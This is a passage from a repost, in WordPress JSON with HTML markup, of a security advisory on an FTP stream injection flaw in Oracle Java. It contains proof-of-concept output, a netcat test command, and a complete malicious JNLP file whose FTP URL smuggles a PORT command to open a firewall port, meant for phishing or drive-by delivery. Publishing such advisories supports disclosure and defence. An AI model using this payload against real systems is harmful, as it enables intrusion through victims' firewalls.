class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44860b258195614-8\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44860b258195614-9\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44860b258195614-10\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44860b258195614-11\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44860b258195614-12\"><span class=\"crayon-e\">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44860b258195614-13\"><span class=\"crayon-e\">Correct <\/span><span class=\"crayon-v\">padding<\/span><span class=\"crayon-o\">!<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44860b258195614-14\"><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">PORT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">57<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44860b258195614-15\"><span class=\"crayon-e\">Client <\/span><span class=\"crayon-e\">has <\/span><span class=\"crayon-i\">opened<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10.1.2.3<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">12345<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce44860b258195614-16\"><span class=\"crayon-e\">Setting <\/span><span class=\"crayon-e\">up <\/span><span class=\"crayon-e\">relay <\/span><span class=\"crayon-i\">on<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">127.0.0.1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">32537<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">connect <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">access <\/span><span class=\"crayon-e\">the <\/span><span class=\"crayon-e\">targeted <\/span><span class=\"crayon-v\">service<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce44860b258195614-17\"><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0016 seconds] -->  <\/p>\n<p>If you see the &#8220;<em>Correct padding!<\/em>&#8221; message, then the FTP service thinks the attack worked. It will immediately spawn a socat process which relays a single TCP connection to the Victim Target (VT). This is done because the Victim Firewall (VF) might time-out the data connection for the FTP command if you don&#8217;t act quickly. By spawning a socat child process, we get the connection established and can hold on to it longer.<\/p>\n<p>The &#8220;<em>Setting up relay&#8230;<\/em>&#8221; message indicates which local TCP port that socat is now listening on. To send a bit of data through this relay, run (using the port mentioned in this message):<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce44860d904154531\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\">  echo pwned | nc 127.0.0.1 32537<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce44860d904154531-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce44860d904154531-1\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">echo <\/span><span class=\"crayon-v\">pwned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">|<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">nc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">127.0.0.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">32537<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>Then observe the listening netcat process running on the Victim Target (VT). The word &#8220;pwned&#8221; should show up on STDOUT.<\/p>\n<p><u>Step 4: Try Java Network Launch Protocol (JNLP) Attacks<\/u><\/p>\n<p>Once you have an FTP URL that works for you in Step 3, you could try the attack from Java WebStart. Edit the the following code (we will call it evil.jnlp) and replace the &#8220;<em>codebase<\/em>&#8221; attribute in the top level &#8220;<em>jnlp<\/em>&#8221; tag, placing your working URL in it.  Then just run this on the Victim Target (VT) &#8211; <em>javaws evil.jnlp<\/em><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58acbce448610287489755\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-mixed-highlight\" title=\"Contains Mixed Languages\"><\/span><\/p>\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &lt;?xml version=&#8221;1.0&#8243; encoding=&#8221;UTF-8&#8243;?&gt;  &lt;jnlp spec=&#8221;1.0+&#8221; codebase=&#8221;ftp:\/\/x:y@1.3.3.7\/leetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0APORT%2010,1,2,3,48,57\/z.txt&#8221; href=&#8221;&#8221;&gt;      &lt;information&gt;          &lt;title&gt;Will Oracle Ever Get It Right?&lt;\/title&gt;          &lt;vendor&gt;Anonymous Pwner&lt;\/vendor&gt;          &lt;icon href=&#8221;foo.jpg&#8221;\/&gt;      &lt;\/information&gt;      &lt;resources&gt;          &lt;!&#8211; Application Resources &#8211;&gt;          &lt;j2se version=&#8221;1.6+&#8221; href=&#8221;http:\/\/java.sun.com\/products\/autodl\/j2se&#8221;\/&gt;          &lt;jar href=&#8221;evil.jar&#8221; main=&#8221;true&#8221; \/&gt;        &lt;\/resources&gt;      &lt;application-desc           name=&#8221;Will Oracle Ever Get It Right?&#8221;           main-class=&#8221;it.does.not.Matter&#8221;           width=&#8221;300&#8243;           height=&#8221;300&#8243;&gt;       &lt;\/application-desc&gt;       &lt;update check=&#8221;background&#8221;\/&gt;  &lt;\/jnlp&gt;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448610287489755-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448610287489755-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448610287489755-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448610287489755-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448610287489755-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448610287489755-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448610287489755-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448610287489755-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448610287489755-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448610287489755-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448610287489755-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448610287489755-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448610287489755-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448610287489755-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448610287489755-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448610287489755-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448610287489755-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448610287489755-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448610287489755-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58acbce448610287489755-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58acbce448610287489755-21\">21<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58acbce448610287489755-1\"><span class=\"crayon-ta\">&lt;?<\/span><span class=\"crayon-e\">xml <\/span><span class=\"crayon-i\">version<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1.0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">encoding<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;UTF-8&#8221;<\/span><span class=\"crayon-ta\">?&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448610287489755-2\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">jnlp <\/span><span class=\"crayon-v\">spec<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1.0+&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">codebase<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;ftp:\/\/x:y@1.3.3.7\/leetXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%0APORT%2010,1,2,3,48,57\/z.txt&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448610287489755-3\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">information<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448610287489755-4\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">title<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Will <\/span><span class=\"crayon-e\">Oracle <\/span><span class=\"crayon-e\">Ever <\/span><span class=\"crayon-e\">Get <\/span><span class=\"crayon-e\">It <\/span><span class=\"crayon-v\">Right<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">title<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448610287489755-5\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">vendor<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Anonymous <\/span><span class=\"crayon-v\">Pwner<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">vendor<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448610287489755-6\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">icon <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;foo.jpg&#8221;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448610287489755-7\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">information<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448610287489755-8\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">resources<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448610287489755-9\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Application <\/span><span class=\"crayon-v\">Resources<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448610287489755-10\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">j2se <\/span><span class=\"crayon-v\">version<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1.6+&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;http:\/\/java.sun.com\/products\/autodl\/j2se&#8221;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448610287489755-11\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">jar <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;evil.jar&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">main<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;true&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448610287489755-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448610287489755-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">resources<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448610287489755-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">desc<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448610287489755-15\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Will Oracle Ever Get It Right?&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448610287489755-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">main<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;it.does.not.Matter&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448610287489755-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">width<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;300&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448610287489755-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">height<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;300&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448610287489755-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">desc<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58acbce448610287489755-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">update <\/span><span class=\"crayon-v\">check<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;background&#8221;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58acbce448610287489755-21\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">jnlp<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0025 seconds] -->  <\/p>\n<p>This will cause Java to try and fetch application components from FTP URLs that trigger the injection. JNLP files are easy to put in web pages, so this is how an attacker trigger the flaw in phishing or drive-by scenarios. Since JNLP files will be parsed by Java even if the browser plugin is disabled, it is a reasonably probable attack scenario. <\/filename><\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3029\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: Maor Schwartz| Date: Tue, 21 Feb 2017 13:51:34 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describes a FTP protocol stream injection vulnerability found in Oracle Java. Java is a general-purpose computer programming language that is concurrent, class-based, object-oriented, and specifically designed to have as few implementation dependencies as possible. It is intended to let application developers &#8220;write once, run anywhere&#8221; (WORA). Credit An independent security &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3029\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Oracle Java FTP Stream Injection<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6710","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6710","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6710"}],"version-history":[{"count":1,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6710\/revisions"}],"predecessor-version":[{"id":6714,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6710\/revisions\/6714"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6710"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6710"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6710"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}